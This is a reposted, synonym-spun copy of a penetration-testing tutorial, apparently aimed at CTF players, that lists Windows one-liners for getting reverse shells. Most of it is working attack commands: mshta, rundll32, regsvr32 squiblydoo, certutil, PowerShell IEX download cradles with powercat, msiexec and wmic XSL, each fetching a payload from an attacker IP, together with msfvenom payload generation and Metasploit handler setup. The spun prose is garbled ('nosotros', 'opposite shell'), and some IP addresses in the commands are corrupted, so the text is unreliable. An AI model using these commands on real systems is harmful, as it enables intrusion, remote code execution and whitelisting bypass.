Write Executable Windows Reverse Tcp Shell Meterpreter Upload
This commodity volition help those who play with CTF challenges because today nosotros volition discuss "Windows One-Liner" to use malicious commands such as PowerShell or rundll32 to get the opposite shell of the Windows system. By and large, while abusing HTTP services or other programs, we go RCE vulnerability. This loophole allows you lot to remotely execute any arrangement command. We take therefore prepared a listing of Windows commands that enable you to use the target machine to become reverse connections.
Table of Content
Mshta.exe
- Launch HTA assail via HTA Web Server of Metasploit
Rundll32.exe
- Launch Rundll32 Set on via SMB Delivery of Metasploit
Regsvr32.exe
- Launch Regsvr32 via Script Web Delivery of Metasploit
Certutil.exe
- Launch MSbuild Assail via Msfvenom C# shellcode
Powershell.exe
- Launch Powercat attack via Powershell
- Launch cscript.exe via Powershell
- Launch Batch File Attack via Powershell
Msiexec.exe
- Launch msiexec set on via msfvenom
Wmic.exe
- Launch Wmic.exe attack via Koadic
Mshta.exe
Mshta.exe runs the Microsoft HTML Application Host, the Windows OS utility responsible for running HTA( HTML Application) files. HTML files that nosotros can run JavaScript or VBScript with. You tin can interpret these files using the Microsoft MSHTA.exe tool.
Metasploit contain the "HTA Spider web Server" module which generates malicious hta file. This module hosts an HTML Application (HTA) that when opened will run a payload via Powershell. When a user navigates to the HTA file they volition be prompted past IE twice before the payload is executed.
employ exploit/windows/misc/hta_server msf exploit(windows/misc/hta_server) > set srvhost 192.168.ane.109 msf exploit(windows/misc/hta_server) > set up lhost 192.168.1.109 msf exploit(windows/misc/hta_server) > exploit
Now run the malicious code through mshta.exe on the victim'south machine (vulnerable to RCE) to obtain meterpreter sessions.
In one case you will execute the malicious hta file on the remote car with the assist of mshta.exe, you get the reverse connection at your local machine (Kali Linux).
mshta.exe http://192.168.1.109:8080/5EEiDSd70ET0k.hta
As you can observe, nosotros have the meterpreter session of the victim as shown below:
Rundll32.exe
Rundll32.exe is associated with Windows Operating Arrangement that allows you to invoke a office exported from a DLL, either 16-chip or 32-bit and store it in proper memory libraries.
Launch Rundll32 Attack via SMB Delivery of Metasploit
Metasploit likewise contain the "SMB Delivery" module which generates malicious dll file. This module serves payloads via an SMB server and provides commands to think and execute the generated payloads. Currently supports DLLs and Powershell.
employ exploit/windows/smb/smb_delivery msf exploit(windows/smb/smb_delivery) > gear up srvhost 192.168.1.109 msf exploit(windows/smb/smb_delivery) > exploit
Now run the malicious code through rundll32.exe on the victim car (vulnerable to RCE) to obtain meterpreter sessions.
Once you lot will execute the dll file on the remote machine with the help of rundll32.exe, y'all will become the opposite connection at your local machine (Kali Linux).
rundll32.exe \\192.168.1.109\vabFG\exam.dll,0
As you can observe, we have the meterpreter session of the victim as shown beneath:
Regsvr32.exe
Regsvr32 is a control-line utility to register and unregister OLE controls, such equally DLLs and ActiveX controls in the Windows Registry. Regsvr32.exe is installed in the %systemroot%\System32 folder in Windows XP and later versions of Windows.
RegSvr32.exe has the following command-line options:
Syntax: Regsvr32 [/s][/u] [/n] [/i[:cmdline]] <dllname>
/u – Unregister server
/i – Call DllInstall passing it an optional [cmdline]; when it is used with /u, it calls dll to uninstall
/due north – practise not call DllRegisterServer; this option must be used with /i
/s – Silent; display no bulletin boxes
Launch Regsvr32 via Script Web Delivery of Metasploit
This module quickly fires upwards a web server that serves a payload. The provided command which will allow for a payload to download and execute. It will exercise it either specified scripting language interpreter or "squiblydoo" via regsvr32.exe for bypassing application whitelisting. The main purpose of this module is to quickly establish a session on a target automobile when the assailant has to manually type in the command: eastward.thou. Control Injection.
Regsvr32 uses "squiblydoo" technique for bypassing application whitelisting. The signed Microsoft binary file, Regsvr32, is able to request a .sct file and then execute the included PowerShell command inside of information technology. Both web requests (i.eastward., the .sct file and PowerShell download/execute) can occur on the same port. "PSH (Binary)" will write a file to the disk, assuasive for custom binaries to exist served upwardly to be downloaded/executed.
use exploit/multi/script/web_delivery msf exploit (web_delivery)>ready target 3 msf exploit (web_delivery)> set payload windows/meterpreter/reverse_tcp msf exploit (web_delivery)> set lhost 192.168.one.109 msf exploit (web_delivery)>gear up srvhost 192.168.1.109 msf exploit (web_delivery)>exploit
Re-create the highlighted text shown in below window
One time yous will execute the scrobj.dll file on the remote automobile with the help of regsrv32.exe, you will get the opposite connection at your local auto (Kali Linux).
regsvr32 /s /n /u /i:http://192.168.1.109:8080/xo31Jt5dIF.sct scrobj.dll
Equally you can observe, nosotros have the meterpreter session of the victim every bit shown below:
Certutil.exe
Certutil.exe is a command-line program that is installed as part of Certificate Services. We can apply this tool to execute our malicious exe file in the target automobile to become a meterpreter session.
Launch certutil Assail via Msfvenom
Generate a malicious executable (.exe) file with msfvenom and start multi/handler to get the reverse shell of the victim'due south machine.
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.109 lport=1234 -f exe > beat out.exe
Now, to dump configuration information or shell.exe file files with certutil. you tin follow below syntax:
Syntax: [-f] [-urlcache] [-dissever] Path of executable file
certutil.exe -urlcache -split -f http://192.168.i.109/shell.exe shell.exe & vanquish.exe
use exploit/multi/handler msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp msf exploit(multi/handler) > set lhost 192.168.1.109 msf exploit(multi/handler) > set lport 1234 msf exploit(multi/handler) > exploit
As you can find, we accept a meterpreter session of the victim every bit shown below:
Powershell.exe
You tin use PowerShell.exe to starting time a PowerShell session from the command line of another tool, such every bit Cmd.exe, or use information technology at the PowerShell command line to outset a new session. Read more from the official website of Microsoft Windows from hither.
Launch Powercat attack via Powershell
Powercat is a PowerShell native backdoor listener and opposite shell besides known as modifying version of netcat because it has integrated support for the generation of encoded payloads, which msfvenom would do and likewise has a client- to- client relay, a term for Powercat client that allows 2 separate listeners to exist connected.
Download PowerShell in your local motorcar then the powercat.ps1 transfer files with python HTTP server to obtain reverse shell of the target as shown below and get-go netcat listener.
git clone https://github.com/besimorhino/powercat.git python -chiliad SimpleHTTPServer 80
Then execute the following control on the remote side to become netcat session.
powershell -c "IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.1.109/powercat.ps1');powercat -c 192.168.i.109 -p 1234 -e cmd" 
As you tin can detect, we accept netcat session of the victim as shown below:
Batch File
Similarly, PowerShell allows the customer to execute bat file, therefore permit's generate the malicious batch file with msfvenom every bit given below and commencement netcat listener.
msfvenom -p cmd/windows/reverse_powershell lhost=192.168.1.109 lport=4444 > 1.bat
Then execute the following command on the remote side to get netcat session.
powershell -c "IEX((New-Object System.Net.WebClient).DownloadString('http://192.168.i.109/ane.bat')) 
Every bit you lot can observe, we have netcat session of the victim as shown below:
Cscript
Similarly, PowerShell allows the client to execute cscript.exe to run wsf, js and vbscript, therefore let'south generate malicious bat file with msfvenom equally given below and kickoff multi/handler as the listener.
msfvenom -p cmd/windows/reverse_powershell lhost=192.168.1.109 lport=1234 -f vbs > 1.vbs
And so execute the following control on the remote side to get a meterpreter session.
powershell.exe -c "(New-Object System.NET.WebClient).DownloadFile('http://192.168.1.109/1.vbs',\"$env:temp\test.vbs\");Start-Process %windir%\system32\cscript.exe \"$env:temp\test.vbs\"" 
use exploit/multi/handler msf exploit(multi/handler) > prepare payload windows/meterpreter/reverse_tcp msf exploit(multi/handler) > gear up lhost 192.168.1.109 msf exploit(multi/handler) > set lport 1234 msf exploit(multi/handler) > exploit
Every bit you can observe, nosotros have meterpreter session of the victim as shown below:
Msiexec.exe
Equally we all are aware that Windows OS comes installed with a Windows Installer engine which is used pastMSI packages for the installation of applications. The executable plan that interprets packages and installs products is Msiexec.exe.
Launch msiexec attack via msfvenom
Let'south generate an MSI Package file (1.msi) utilizing the Windows Meterpreter payload as follows and start multi/handler as the listener.
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.109 lport=1234 -f msi > ane.msi
Once you volition execute the one.msi file on the remote automobile with the aid of msiexec, y'all will get the reverse connexion at your local machine (Kali Linux).
msiexec /q /i http://192.168.i.109/ane.msi
use exploit/multi/handler msf exploit(multi/handler) > ready payload windows/meterpreter/reverse_tcp msf exploit(multi/handler) > prepare lhost 192.168.1.109 msf exploit(multi/handler) > ready lport 1234 msf exploit(multi/handler) > exploit
Every bit you tin notice, we have meterpreter session of the victim as shown beneath:
Wmic.exe
The WMIC utility is a Microsoft tool provides a WMI command-line interface that is used for a variety of administrative functions for local and remote machine and also used to wmic query such every bit system settings, stop processes and execute scripts locally or remotely. Therefore, information technology can invoke XSL script (eXtensible Stylesheet Linguistic communication).
Launch Wmic.exe attack via Koadic
Now will generate a malicious XSL file with the help of koadic which is a Control & Control tool which is quite similar to Metasploit and Powershell Empire.
To know how koadic works, read our commodity from here: https://world wide web.hackingarticles.in/koadic-com-command-control-framework/
One time installation gets completed, you tin can run./koadic file to start koadic and commencement with loading the stager/js/wmic stager past running the post-obit control and set SRVHOST where the stager should call habitation.
use stager/js/wmic set SRVHOST 192.168.1.107 run
Execute WMIC following command to download and run the malicious XSL file from a remote server:
wmic os get /FORMAT:"http://192.168.ane.107:9996/g8gkv.xsl"
One time the malicious XSL file volition get executed on the target machine, you lot volition have aZombie connection merely like Metasploit.
Author:AArti Singh is a Researcher and Technical Writer at Hacking Manufactures an Information Security Consultant Social Media Lover and Gadgets. Contact hither
dominguezhime1997.blogspot.com
Source: https://www.hackingarticles.in/get-reverse-shell-via-windows-one-liner/
Post a Comment for "Write Executable Windows Reverse Tcp Shell Meterpreter Upload"